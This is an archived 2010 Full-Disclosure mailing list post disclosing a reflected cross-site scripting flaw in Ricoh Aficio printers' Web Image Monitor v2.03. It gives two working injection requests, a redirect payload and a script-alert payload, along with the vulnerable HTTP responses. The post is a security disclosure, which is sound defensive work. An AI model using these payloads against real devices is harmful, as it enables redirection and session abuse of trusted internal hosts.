lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 9 Nov 2010 13:24:28 -0500
From: The Light Cosine <thelightcosine@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Reflected XSS in Ricoh Aficio Web Image Monitor
	v2.03

I was poking at some Ricoh MFPs several days ago, when I found this. It is
nothing to get to terribly excited about as it's just a reflected XSS.
However, the ability to abuse any trusted internal IP should be considered a
threat. Companies have taken big hits from less. So without further ado,
here are the petty little details:


Tested successfully on numerous different Ricoh Aficio models, all running
v2.03 of the Web Image Monitor interface. Responses included below are html
encoded for your protection.

Fun with Redirects:

My inital test was just an abuse of the redirect functionality that is being
exploited for the vector.

GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1


HTTP/1.0 200 OK

Date: Tue, 09 Nov 2010 17:58:00 GMT

Server: Web-Server/3.0

Content-Type: text/html; charset=UTF-8

Content-Length: 683

Expires: Tue, 09 Nov 2010 17:58:00 GMT

Pragma: no-cache

Cache-Control: no-cache

Set-Cookie: cookieOnOffChecker=on; path=/

Connection: close


&lt;html&gt;&lt;head&gt;

&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;

&lt;meta http-equiv="refresh" content="1;
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&amp;buttonURL=/../../../"&gt;

&lt;meta http-equiv="Cache-Control" content="no-cache"&gt;

&lt;meta http-equiv="Pragma" content="no-cache"&gt;

&lt;meta http-equiv="Expires" content="-1"&gt;

&lt;title&gt;Web Image Monitor&lt;/title&gt;

&lt;script language="javascript"&gt;

&lt;!--

function jumpPage(){

self.document.cookie="cookieOnOffChecker=on; path=/";

location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="
http://cosine-security.blogspot.com";

}

// --&gt;

&lt;/script&gt;

&lt;/head&gt;

&lt;body onLoad="jumpPage()"&gt;&lt;/body&gt;

&lt;/html&gt;



A more traditional XSS test will still work just as well of course:


Traditional Test:

GET /?--&gt;&lt;/script&gt;&lt;script&gt;alert(51494)&lt;/script&gt;
HTTP/1.1



HTTP/1.0 200 OK

Date: Fri, 29 Oct 2010 17:43:19 GMT

Server: Web-Server/3.0

Content-Type: text/html; charset=UTF-8

Content-Length: 672

Expires: Fri, 29 Oct 2010 17:43:19 GMT

Pragma: no-cache

Cache-Control: no-cache

Set-Cookie: cookieOnOffChecker=on; path=/

Connection: close


&lt;html&gt;&lt;head&gt;

&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;

&lt;meta http-equiv="refresh" content="1;
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&amp;buttonURL=/../../../"&gt;

&lt;meta http-equiv="Cache-Control" content="no-cache"&gt;

&lt;meta http-equiv="Pragma" content="no-cache"&gt;

&lt;meta http-equiv="Expires" content="-1"&gt;

&lt;title&gt;Web Image Monitor&lt;/title&gt;

&lt;script language="javascript"&gt;

&lt;!--

function jumpPage(){

self.document.cookie="cookieOnOffChecker=on; path=/";

location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--&gt;&lt;/script&gt;&lt;script&gt;alert(51494)&lt;/script&gt;";

}

// --&gt;

&lt;/script&gt;

&lt;/head&gt;

&lt;body onLoad="jumpPage()"&gt;&lt;/body&gt;


The same writeup, including a screenshot, can be found at
http://cosine-security.blogspot.com/2010/11/ricoh-web-image-monitor-203-reflected.html

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ